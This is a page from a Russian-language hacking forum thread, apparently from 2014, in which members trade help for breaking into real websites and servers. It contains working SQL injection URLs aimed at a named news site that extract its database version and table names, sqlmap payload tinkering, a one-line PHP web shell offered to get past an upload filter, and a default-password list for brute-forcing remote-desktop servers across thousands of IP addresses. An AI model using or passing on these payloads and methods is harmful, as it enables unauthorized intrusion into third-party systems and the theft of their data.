Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. BigBanMan

    BigBanMan New Member

    Joined:
    13 Apr 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0

    Для начала спасибо вам, попробую.
    А так я и вправду видел это, но как это применять в команде не понимал. Тоесть если у меня:
    Payload: '"%2bSLEEP(15)--
    то команда будет включать
    Code:
    --prefix=""%2b"
    ?
     
    #22981 BigBanMan, 25 Jan 2014
    Last edited: 25 Jan 2014
  2. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    958
    Likes Received:
    527
    Reputations:
    204
    Проблема в отсутствии знаний.
    http://armtoday.info/default.asp?search=asd')UNION/**/SELECT/**/1,2,version(),4,5,6--%20a&submit=%D0%98%D1%81%D0%BA%D0%B0%D1%82%D1%8C&mode=allwords&SectionID=-1&Lang=_Ru
     
    1 person likes this.
  3. 2fed

    2fed Member

    Joined:
    26 Mar 2008
    Messages:
    38
    Likes Received:
    6
    Reputations:
    0
    опять ничего(
     
    #22983 2fed, 26 Jan 2014
    Last edited: 26 Jan 2014
  4. T.G.K

    T.G.K Banned

    Joined:
    12 Sep 2013
    Messages:
    29
    Likes Received:
    7
    Reputations:
    12
    Что можно сделать с этим: http://rp-gameworld.ru/index.php?c=registration&action=reg
    или http://rp-gameworld.ru/?c=search
     
    1 person likes this.
  5. 2fed

    2fed Member

    Joined:
    26 Mar 2008
    Messages:
    38
    Likes Received:
    6
    Reputations:
    0
    Host IP: 90.156.201.28
    Web Server: Microsoft-IIS/8.0у
    Powered-by: ASP.NET
    Keyword Found: Не
    I guess injection type is Integer?! If injection failed, retry with a manual keyword.
    DB Server: MySQL
    Finding columns count(MySQL,MsSQL 2005): 1

    и всё ничего не находит.
     
  6. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    423
    Likes Received:
    165
    Reputations:
    126
    Не через мозилу открывай.
    [​IMG]
     
    _________________________
  7. 2fed

    2fed Member

    Joined:
    26 Mar 2008
    Messages:
    38
    Likes Received:
    6
    Reputations:
    0
    а что на счет
    http://aztexnika.az/uppload.php

    http://aztexnika.az/admin/uppload.php
     
  8. 2fed

    2fed Member

    Joined:
    26 Mar 2008
    Messages:
    38
    Likes Received:
    6
    Reputations:
    0
    да уж

    причем тут мозилла ?))
     
  9. 2fed

    2fed Member

    Joined:
    26 Mar 2008
    Messages:
    38
    Likes Received:
    6
    Reputations:
    0
    http://armtoday.info/default.asp?search=asd')UNION/**/SELECT/**/1,2,(select/**/unhex(hex(table_name))/**/from/**/information_schema.tables/**/limit/**/0,1),4,5,6-- a&submit=Искать&mode=allwords&SectionID=-1&Lang=_Ru
     
  10. salevan

    salevan New Member

    Joined:
    24 Jan 2014
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    здравствуйте.
    вопрос в следующем. у меня интернет соединение 20кб/с. с таким интернетом дедик юзать не актуально ,как я понимаю(поправьте, если не прав). собственно вопрос, как обезопасить себя. виртуалка? торы? что сделать. простите, на форуме очень много воды, искать нужную информацию просто нет времени.
     
  11. BigBanMan

    BigBanMan New Member

    Joined:
    13 Apr 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Ребята, прошу, скажите что такое payload и как его задать в ручную в sqlmap(
    Если Payload: '"%2bSLEEP(15)--
    То --prefix=""%2b"
    Так? если так то не идет всеравно
     
  12. Zed0x

    Zed0x Member

    Joined:
    4 Jun 2012
    Messages:
    114
    Likes Received:
    29
    Reputations:
    23
    Тебе дали готовый запрос к sqlmap, просто скопируй и вставь в терминал.
     
  13. BigBanMan

    BigBanMan New Member

    Joined:
    13 Apr 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Я бы не просил объяснить если работало бы. Дело в том что и не получается.
     
  14. Facecontrol

    Facecontrol New Member

    Joined:
    12 Mar 2012
    Messages:
    41
    Likes Received:
    0
    Reputations:
    0
    как найти полный путь к корню сайта
     
  15. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    198
    Likes Received:
    161
    Reputations:
    108
    phpinfo, ошибки php, подбор пути, исходя из параметров сервера
     
  16. Oro4imaru

    Oro4imaru New Member

    Joined:
    17 Jul 2010
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    возможно ли провести иньекцыю в запросе
    ошибка получается в запросе
    дайте напутствие господа форумчане заранее благодарен
     
  17. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,417
    Likes Received:
    815
    Reputations:
    848
    Да, надо только закончить логическую структуру запроса!

    К примеру:
    SELECT DISTINCT forum.title from forum AS
    forum WHERE forumid IN (2
    ) and 1=1 -- )
     
    _________________________
  18. Cherep

    Cherep New Member

    Joined:
    30 May 2010
    Messages:
    162
    Likes Received:
    1
    Reputations:
    -10
    В админке есть заливка файлов, надо залить шелл. При попытке залить походу срабатывает что-то типо антивирусника или фаервола(заливаю чистый пхп с шеллом-не льется, заливаю пхп файл с phpinfo() - все спокойно выдает).
    Че делать?
     
  19. ph1l1ster

    ph1l1ster Elder - Старейшина

    Joined:
    11 Mar 2008
    Messages:
    398
    Likes Received:
    152
    Reputations:
    19
    попробуй залить

    <?system($_GET[cmd])?> или passthru(), или exec() вместо system()
    будет доступен:
    shell.php?cmd=uname
     
  20. nike001

    nike001 New Member

    Joined:
    19 Jan 2014
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    Знаю, что вопрос немного не по теме, но подходящей я не нашёл.
    Есть ли шанс сбрутить дедик с логинами
    Code:
    Administrator
    admin
    и пасами
    Code:
    administrator
    admin
    password
    pass
    p@ssword
    passw0rd
    p@ssw0rd
    1
    12
    123
    1234
    12345
    123456
    0
    00
    000
    0000
    00000
    support
    123456
    У меня 3000 ip-шников. Или словарь надо больше и я впустую потрачу время?
     
Loading...
Thread Status:
Not open for further replies.